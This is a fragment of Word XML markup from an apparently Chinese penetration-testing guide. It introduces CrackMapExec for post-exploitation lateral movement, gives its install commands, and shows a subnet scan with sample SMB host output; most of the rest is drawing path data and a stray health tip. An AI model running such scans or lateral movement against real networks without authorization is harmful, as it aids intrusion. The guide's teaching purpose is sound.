          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micro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poor.blogspot.com/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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>请多喝点热水或者凉白开，可预防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>肾结石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，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>痛风</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等。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1203" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CrackMapExec弥补了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSF4下auxiliary，scanner模块下的Command执行方式，但MSF5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已解决</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该问题。在MSF4下，该框架针对后渗透的横向移动经常出现，虽然MSF5已解决该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>问题，但该框架在配合bloodhound与empire依然目</w:t>
      </w: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前有一定优势。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="2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安装方式：from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-43"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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Wiki：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-16"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ali：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="15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apt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get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install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crackmapexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="338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但作者推荐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pipenv安</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>装：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="157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apt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get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install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y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libssl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dev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libffi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dev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python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dev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build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essential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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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pip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install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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐user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pipenv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1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git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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clone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‐‐recursive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https://github.com/byt3bl33d3r/CrackMapExec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4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cd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CrackMapExec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&amp;&amp;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pipenv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install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7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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pipenv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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shell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python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setup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py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install</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="330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32"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-46"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OSX：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pip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install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6e7f8f"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐user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crackmapexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="315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默认为100</w:t>
      </w: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线程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cme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.0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/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24</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136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2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4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JOHN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PC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Windows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7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Ultimate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7601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Service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Pack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x64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name:JOHN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PC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domain:JOHN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PC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signing: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False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SMBv1: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True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)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.119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WIN03X64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Windows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Server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2003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R2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3790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Service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Pack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x32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name:WIN03X64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domain:WIN03X64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signing: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False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SMBv1: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True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19.500pt;margin-top:91.500pt;width:0.500pt;height:485.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,1830" coordsize="10,9710">
        <v:shape style="position:absolute;left:10390;top:1830;width:10;height:9710" coordorigin="10390,1830" coordsize="10,9710" path="m10402,1840l10402,1840,10402,1840,10402,1840,10402,1840,10402,1840,10402,1841,10402,1841,10402,1842,10402,1843,10402,1844,10402,1846,10402,1848,10402,1850,10402,1853,10402,1856,10402,1859,10402,1864,10402,1868,10402,1874,10402,1879,10402,1886,10402,1893,10402,1901,10402,1910,10402,1920,10402,1930,10402,1941,10402,1953,10402,1966,10402,1980,10402,1995,10402,2012,10402,2029,10402,2047,10402,2066,10402,2087,10402,2109,10402,2132,10402,2156,10402,2182,10402,2209,10402,2237,10402,2267,10402,2298,10402,2331,10402,2365,10402,2401,10402,2438,10402,2477,10402,2518,10402,2560,10402,2604,10402,2650,10402,2698,10402,2747,10402,2799,10402,2852,10402,2907,10402,2964,10402,3023,10402,3085,10402,3148,10402,3213,10402,3281,10402,3350,10402,3422,10402,3496,10402,3573,10402,3652,10402,3733,10402,3816,10402,3902,10402,3991,10402,4081,10402,4175,10402,4271,10402,4369,10402,4470,10402,4574,10402,4681,10402,4790,10402,4902,10402,5017,10402,5135,10402,5255,10402,5379,10402,5505,10402,5634,10402,5767,10402,5902,10402,6040,10402,6182,10402,6327,10402,6475,10402,6626,10402,6780,10402,6938,10402,7099,10402,7263,10402,7431,10402,7602,10402,7777,10402,7955,10402,8136,10402,8321,10402,8510,10402,8703,10402,8899,10402,9098,10402,9302,10402,9509,10402,9720,10402,9935,10402,10154,10402,10377,10402,10603,10402,10834,10402,11068,10402,11307,10402,11550e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:91.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1830" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:1830;width:8990;height:670" coordorigin="1490,1830" coordsize="8990,670" path="m1510,1840l1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1510,1840,1511,1840,1512,1840,1512,1840,1514,1840,1515,1840,1517,1840,1519,1840,1521,1840,1524,1840,1528,1840,1532,1840,1536,1840,1541,1840,1546,1840,1552,1840,1559,1840,1566,1840,1575,1840,1583,1840,1593,1840,1603,1840,1615,1840,1627,1840,1640,1840,1654,1840,1668,1840,1684,1840,1701,1840,1719,1840,1738,1840,1758,1840,1780,1840,1802,1840,1826,1840,1851,1840,1877,1840,1904,1840,1933,1840,1963,1840,1995,1840,2028,1840,2063,1840,2099,1840,2136,1840,2175,1840,2216,1840,2259,1840,2303,1840,2348,1840,2396,1840,2445,1840,2496,1840,2549,1840,2604,1840,2660,1840,2719,1840,2779,1840,2841,1840,2906,1840,2972,1840,3041,1840,3112,1840,3184,1840,3259,1840,3336,1840,3416,1840,3498,1840,3582,1840,3668,1840,3757,1840,3848,1840,3941,1840,4037,1840,4136,1840,4236,1840,4340,1840,4446,1840,4555,1840,4666,1840,4780,1840,4897,1840,5017,1840,5139,1840,5264,1840,5392,1840,5523,1840,5657,1840,5793,1840,5933,1840,6076,1840,6222,1840,6370,1840,6522,1840,6677,1840,6835,1840,6997,1840,7161,1840,7329,1840,7500,1840,7675,1840,7853,1840,8034,1840,8219,1840,8407,1840,8598,1840,8793,1840,8992,1840,9194,1840,9400,1840,9609,1840,9823,1840,10039,1840,10260,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1840,10484,1841,10484,1841,10484,1841,10484,1841,10484,1842,10484,1842,10484,1842,10484,1843,10484,1843,10484,1844,10484,1844,10484,1845,10484,1845,10484,1846,10484,1847,10484,1848,10484,1849,10484,1849,10484,1851,10484,1852,10484,1853,10484,1854,10484,1855,10484,1857,10484,1858,10484,1860,10484,1861,10484,1863,10484,1865,10484,1867,10484,1869,10484,1871,10484,1873,10484,1876,10484,1878,10484,1881,10484,1883,10484,1886,10484,1889,10484,1892,10484,1895,10484,1898,10484,1902,10484,1905,10484,1909,10484,1912,10484,1916,10484,1920,10484,1925,10484,1929,10484,1933,10484,1938,10484,1943,10484,1948,10484,1953,10484,1958,10484,1963,10484,1969,10484,1974,10484,1980,10484,1986,10484,1992,10484,1999,10484,2005,10484,2012,10484,2019,10484,2026,10484,2033,10484,2041,10484,2048,10484,2056,10484,2064,10484,2072,10484,2081,10484,2089,10484,2098,10484,2107,10484,2116,10484,2126,10484,2135,10484,2145,10484,2155,10484,2165,10484,2176,10484,2187,10484,2198,10484,2209,10484,2220,10484,2232,10484,2244,10484,2256,10484,2268,10484,2281,10484,2294,10484,2307,10484,2320,10484,2334,10484,2347,10484,2361,10484,2376,10484,2390,10484,2405,10484,2420,10484,2436,10484,2452,10484,2468,10484,2484,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10483,2500,10482,2500,10482,2500,10480,2500,10479,2500,10477,2500,10475,2500,10473,2500,10470,2500,10466,2500,10462,2500,10458,2500,10453,2500,10448,2500,10442,2500,10435,2500,10428,2500,10419,2500,10411,2500,10401,2500,10391,2500,10379,2500,10367,2500,10354,2500,10340,2500,10326,2500,10310,2500,10293,2500,10275,2500,10256,2500,10236,2500,10215,2500,10192,2500,10168,2500,10143,2500,10117,2500,10090,2500,10061,2500,10031,2500,9999,2500,9966,2500,9931,2500,9895,2500,9858,2500,9819,2500,9778,2500,9735,2500,9691,2500,9646,2500,9598,2500,9549,2500,9498,2500,9445,2500,9391,2500,9334,2500,9275,2500,9215,2500,9153,2500,9088,2500,9022,2500,8953,2500,8883,2500,8810,2500,8735,2500,8658,2500,8578,2500,8497,2500,8413,2500,8326,2500,8238,2500,8146,2500,8053,2500,7957,2500,7859,2500,7758,2500,7654,2500,7548,2500,7439,2500,7328,2500,7214,2500,7097,2500,6977,2500,6855,2500,6730,2500,6602,2500,6471,2500,6337,2500,6201,2500,6061,2500,5918,2500,5773,2500,5624,2500,5472,2500,5317,2500,5159,2500,4997,2500,4833,2500,4665,2500,4494,2500,4319,2500,4141,2500,3960,2500,3776,2500,3587,2500,3396,2500,3201,2500,3002,2500,2800,2500,2594,2500,2385,2500,2172,2500,1955,2500,1734,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2499,1510,2499,1510,2499,1510,2499,1510,2498,1510,2498,1510,2498,1510,2497,1510,2497,1510,2496,1510,2495,1510,2495,1510,2494,1510,2493,1510,2493,1510,2492,1510,2491,1510,2490,1510,2489,1510,2487,1510,2486,1510,2485,1510,2483,1510,2482,1510,2480,1510,2479,1510,2477,1510,2475,1510,2473,1510,2471,1510,2469,1510,2467,1510,2465,1510,2462,1510,2460,1510,2457,1510,2454,1510,2451,1510,2448,1510,2445,1510,2442,1510,2439,1510,2435,1510,2431,1510,2428,1510,2424,1510,2420,1510,2416,1510,2411,1510,2407,1510,2402,1510,2398,1510,2393,1510,2388,1510,2382,1510,2377,1510,2372,1510,2366,1510,2360,1510,2354,1510,2348,1510,2341,1510,2335,1510,2328,1510,2321,1510,2314,1510,2307,1510,2300,1510,2292,1510,2284,1510,2276,1510,2268,1510,2260,1510,2251,1510,2242,1510,2233,1510,2224,1510,2215,1510,2205,1510,2195,1510,2185,1510,2175,1510,2164,1510,2154,1510,2143,1510,2131,1510,2120,1510,2108,1510,2097,1510,2084,1510,2072,1510,2059,1510,2047,1510,2034,1510,2020,1510,2007,1510,1993,1510,1979,1510,1964,1510,1950,1510,1935,1510,1920,1510,1904,1510,1889,1510,1873,1510,1856,1510,1840e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:90.599pt;width:445.800pt;height:34.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:124.500pt;width:449.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2490" coordsize="8990,630">
        <v:shape style="position:absolute;left:1490;top:2490;width:8990;height:630" coordorigin="1490,2490" coordsize="8990,630" path="m1510,2500l1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1510,2500,1511,2500,1512,2500,1512,2500,1514,2500,1515,2500,1517,2500,1519,2500,1521,2500,1524,2500,1528,2500,1532,2500,1536,2500,1541,2500,1546,2500,1552,2500,1559,2500,1566,2500,1575,2500,1583,2500,1593,2500,1603,2500,1615,2500,1627,2500,1640,2500,1654,2500,1668,2500,1684,2500,1701,2500,1719,2500,1738,2500,1758,2500,1780,2500,1802,2500,1826,2500,1851,2500,1877,2500,1904,2500,1933,2500,1963,2500,1995,2500,2028,2500,2063,2500,2099,2500,2136,2500,2175,2500,2216,2500,2259,2500,2303,2500,2348,2500,2396,2500,2445,2500,2496,2500,2549,2500,2604,2500,2660,2500,2719,2500,2779,2500,2841,2500,2906,2500,2972,2500,3041,2500,3112,2500,3184,2500,3259,2500,3336,2500,3416,2500,3498,2500,3582,2500,3668,2500,3757,2500,3848,2500,3941,2500,4037,2500,4136,2500,4236,2500,4340,2500,4446,2500,4555,2500,4666,2500,4780,2500,4897,2500,5017,2500,5139,2500,5264,2500,5392,2500,5523,2500,5657,2500,5793,2500,5933,2500,6076,2500,6222,2500,6370,2500,6522,2500,6677,2500,6835,2500,6997,2500,7161,2500,7329,2500,7500,2500,7675,2500,7853,2500,8034,2500,8219,2500,8407,2500,8598,2500,8793,2500,8992,2500,9194,2500,9400,2500,9609,2500,9823,2500,10039,2500,10260,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2500,10484,2501,10484,2501,10484,2501,10484,2501,10484,2501,10484,2501,10484,2502,10484,2502,10484,2502,10484,2502,10484,2503,10484,2503,10484,2504,10484,2504,10484,2505,10484,2505,10484,2506,10484,2507,10484,2508,10484,2508,10484,2509,10484,2510,10484,2511,10484,2513,10484,2514,10484,2515,10484,2516,10484,2518,10484,2519,10484,2521,10484,2522,10484,2524,10484,2526,10484,2528,10484,2530,10484,2532,10484,2534,10484,2537,10484,2539,10484,2542,10484,2544,10484,2547,10484,2550,10484,2553,10484,2556,10484,2559,10484,2562,10484,2566,10484,2570,10484,2573,10484,2577,10484,2581,10484,2585,10484,2589,10484,2594,10484,2598,10484,2603,10484,2608,10484,2613,10484,2618,10484,2623,10484,2629,10484,2634,10484,2640,10484,2646,10484,2652,10484,2658,10484,2664,10484,2671,10484,2678,10484,2685,10484,2692,10484,2699,10484,2706,10484,2714,10484,2722,10484,2730,10484,2738,10484,2747,10484,2755,10484,2764,10484,2773,10484,2782,10484,2792,10484,2801,10484,2811,10484,2821,10484,2831,10484,2842,10484,2852,10484,2863,10484,2874,10484,2886,10484,2897,10484,2909,10484,2921,10484,2933,10484,2946,10484,2958,10484,2971,10484,2985,10484,2998,10484,3012,10484,3026,10484,3040,10484,3054,10484,3069,10484,3084,10484,3099,10484,3115,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10483,3131,10482,3131,10482,3131,10480,3131,10479,3131,10477,3131,10475,3131,10473,3131,10470,3131,10466,3131,10462,3131,10458,3131,10453,3131,10448,3131,10442,3131,10435,3131,10428,3131,10419,3131,10411,3131,10401,3131,10391,3131,10379,3131,10367,3131,10354,3131,10340,3131,10326,3131,10310,3131,10293,3131,10275,3131,10256,3131,10236,3131,10215,3131,10192,3131,10168,3131,10143,3131,10117,3131,10090,3131,10061,3131,10031,3131,9999,3131,9966,3131,9931,3131,9895,3131,9858,3131,9819,3131,9778,3131,9735,3131,9691,3131,9646,3131,9598,3131,9549,3131,9498,3131,9445,3131,9391,3131,9334,3131,9275,3131,9215,3131,9153,3131,9088,3131,9022,3131,8953,3131,8883,3131,8810,3131,8735,3131,8658,3131,8578,3131,8497,3131,8413,3131,8326,3131,8238,3131,8146,3131,8053,3131,7957,3131,7859,3131,7758,3131,7654,3131,7548,3131,7439,3131,7328,3131,7214,3131,7097,3131,6977,3131,6855,3131,6730,3131,6602,3131,6471,3131,6337,3131,6201,3131,6061,3131,5918,3131,5773,3131,5624,3131,5472,3131,5317,3131,5159,3131,4997,3131,4833,3131,4665,3131,4494,3131,4319,3131,4141,3131,3960,3131,3776,3131,3587,3131,3396,3131,3201,3131,3002,3131,2800,3131,2594,3131,2385,3131,2172,3131,1955,3131,1734,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3130,1510,3129,1510,3129,1510,3129,1510,3128,1510,3128,1510,3128,1510,3127,1510,3127,1510,3126,1510,3125,1510,3125,1510,3124,1510,3123,1510,3122,1510,3121,1510,3120,1510,3119,1510,3118,1510,3117,1510,3116,1510,3115,1510,3113,1510,3112,1510,3110,1510,3108,1510,3107,1510,3105,1510,3103,1510,3101,1510,3099,1510,3096,1510,3094,1510,3092,1510,3089,1510,3087,1510,3084,1510,3081,1510,3078,1510,3075,1510,3072,1510,3068,1510,3065,1510,3061,1510,3058,1510,3054,1510,3050,1510,3046,1510,3041,1510,3037,1510,3033,1510,3028,1510,3023,1510,3018,1510,3013,1510,3008,1510,3002,1510,2997,1510,2991,1510,2985,1510,2979,1510,2973,1510,2966,1510,2960,1510,2953,1510,2946,1510,2939,1510,2932,1510,2924,1510,2917,1510,2909,1510,2901,1510,2893,1510,2884,1510,2876,1510,2867,1510,2858,1510,2849,1510,2839,1510,2830,1510,2820,1510,2810,1510,2800,1510,2789,1510,2779,1510,2768,1510,2757,1510,2745,1510,2734,1510,2722,1510,2710,1510,2698,1510,2685,1510,2672,1510,2659,1510,2646,1510,2633,1510,2619,1510,2605,1510,2591,1510,2576,1510,2562,1510,2547,1510,2532,1510,2516,1510,2500e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:124.500pt;width:1.500pt;height:31.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2490" coordsize="30,630">
        <v:shape style="position:absolute;left:1490;top:2490;width:30;height:630" coordorigin="1490,2490" coordsize="30,630" path="m1517,2500l1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2500,1517,2501,1517,2501,1517,2501,1517,2501,1517,2501,1517,2501,1517,2502,1517,2502,1517,2502,1517,2502,1517,2503,1517,2503,1517,2504,1517,2504,1517,2505,1517,2505,1517,2506,1517,2507,1517,2508,1517,2508,1517,2509,1517,2510,1517,2511,1517,2513,1517,2514,1517,2515,1517,2516,1517,2518,1517,2519,1517,2521,1517,2522,1517,2524,1517,2526,1517,2528,1517,2530,1517,2532,1517,2534,1517,2537,1517,2539,1517,2542,1517,2544,1517,2547,1517,2550,1517,2553,1517,2556,1517,2559,1517,2562,1517,2566,1517,2570,1517,2573,1517,2577,1517,2581,1517,2585,1517,2589,1517,2594,1517,2598,1517,2603,1517,2608,1517,2613,1517,2618,1517,2623,1517,2629,1517,2634,1517,2640,1517,2646,1517,2652,1517,2658,1517,2664,1517,2671,1517,2678,1517,2685,1517,2692,1517,2699,1517,2706,1517,2714,1517,2722,1517,2730,1517,2738,1517,2747,1517,2755,1517,2764,1517,2773,1517,2782,1517,2792,1517,2801,1517,2811,1517,2821,1517,2831,1517,2842,1517,2852,1517,2863,1517,2874,1517,2886,1517,2897,1517,2909,1517,2921,1517,2933,1517,2946,1517,2958,1517,2971,1517,2985,1517,2998,1517,3012,1517,3026,1517,3040,1517,3054,1517,3069,1517,3084,1517,3099,1517,3115,1517,3131e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:155.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3110" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:3110;width:8990;height:650" coordorigin="1490,3110" coordsize="8990,650" path="m1510,3131l1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1510,3131,1511,3131,1512,3131,1512,3131,1514,3131,1515,3131,1517,3131,1519,3131,1521,3131,1524,3131,1528,3131,1532,3131,1536,3131,1541,3131,1546,3131,1552,3131,1559,3131,1566,3131,1575,3131,1583,3131,1593,3131,1603,3131,1615,3131,1627,3131,1640,3131,1654,3131,1668,3131,1684,3131,1701,3131,1719,3131,1738,3131,1758,3131,1780,3131,1802,3131,1826,3131,1851,3131,1877,3131,1904,3131,1933,3131,1963,3131,1995,3131,2028,3131,2063,3131,2099,3131,2136,3131,2175,3131,2216,3131,2259,3131,2303,3131,2348,3131,2396,3131,2445,3131,2496,3131,2549,3131,2604,3131,2660,3131,2719,3131,2779,3131,2841,3131,2906,3131,2972,3131,3041,3131,3112,3131,3184,3131,3259,3131,3336,3131,3416,3131,3498,3131,3582,3131,3668,3131,3757,3131,3848,3131,3941,3131,4037,3131,4136,3131,4236,3131,4340,3131,4446,3131,4555,3131,4666,3131,4780,3131,4897,3131,5017,3131,5139,3131,5264,3131,5392,3131,5523,3131,5657,3131,5793,3131,5933,3131,6076,3131,6222,3131,6370,3131,6522,3131,6677,3131,6835,3131,6997,3131,7161,3131,7329,3131,7500,3131,7675,3131,7853,3131,8034,3131,8219,3131,8407,3131,8598,3131,8793,3131,8992,3131,9194,3131,9400,3131,9609,3131,9823,3131,10039,3131,10260,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3131,10484,3132,10484,3132,10484,3132,10484,3132,10484,3133,10484,3133,10484,3134,10484,3134,10484,3135,10484,3135,10484,3136,10484,3137,10484,3137,10484,3138,10484,3139,10484,3140,10484,3141,10484,3142,10484,3143,10484,3144,10484,3146,10484,3147,10484,3148,10484,3150,10484,3152,10484,3153,10484,3155,10484,3157,10484,3159,10484,3161,10484,3163,10484,3165,10484,3168,10484,3170,10484,3173,10484,3176,10484,3178,10484,3181,10484,3184,10484,3188,10484,3191,10484,3194,10484,3198,10484,3201,10484,3205,10484,3209,10484,3213,10484,3217,10484,3222,10484,3226,10484,3231,10484,3236,10484,3241,10484,3246,10484,3251,10484,3256,10484,3262,10484,3268,10484,3274,10484,3280,10484,3286,10484,3292,10484,3299,10484,3305,10484,3312,10484,3319,10484,3327,10484,3334,10484,3342,10484,3350,10484,3358,10484,3366,10484,3374,10484,3383,10484,3392,10484,3401,10484,3410,10484,3419,10484,3429,10484,3439,10484,3449,10484,3459,10484,3469,10484,3480,10484,3491,10484,3502,10484,3514,10484,3525,10484,3537,10484,3549,10484,3561,10484,3574,10484,3587,10484,3600,10484,3613,10484,3627,10484,3640,10484,3654,10484,3669,10484,3683,10484,3698,10484,3713,10484,3728,10484,3744,10484,3760,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10484,3776,10483,3776,10482,3776,10482,3776,10480,3776,10479,3776,10477,3776,10475,3776,10473,3776,10470,3776,10466,3776,10462,3776,10458,3776,10453,3776,10448,3776,10442,3776,10435,3776,10428,3776,10419,3776,10411,3776,10401,3776,10391,3776,10379,3776,10367,3776,10354,3776,10340,3776,10326,3776,10310,3776,10293,3776,10275,3776,10256,3776,10236,3776,10215,3776,10192,3776,10168,3776,10143,3776,10117,3776,10090,3776,10061,3776,10031,3776,9999,3776,9966,3776,9931,3776,9895,3776,9858,3776,9819,3776,9778,3776,9735,3776,9691,3776,9646,3776,9598,3776,9549,3776,9498,3776,9445,3776,9391,3776,9334,3776,9275,3776,9215,3776,9153,3776,9088,3776,9022,3776,8953,3776,8883,3776,8810,3776,8735,3776,8658,3776,8578,3776,8497,3776,8413,3776,8326,3776,8238,3776,8146,3776,8053,3776,7957,3776,7859,3776,7758,3776,7654,3776,7548,3776,7439,3776,7328,3776,7214,3776,7097,3776,6977,3776,6855,3776,6730,3776,6602,3776,6471,3776,6337,3776,6201,3776,6061,3776,5918,3776,5773,3776,5624,3776,5472,3776,5317,3776,5159,3776,4997,3776,4833,3776,4665,3776,4494,3776,4319,3776,4141,3776,3960,3776,3776,3776,3587,3776,3396,3776,3201,3776,3002,3776,2800,3776,2594,3776,2385,3776,2172,3776,1955,3776,1734,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510,3776,1510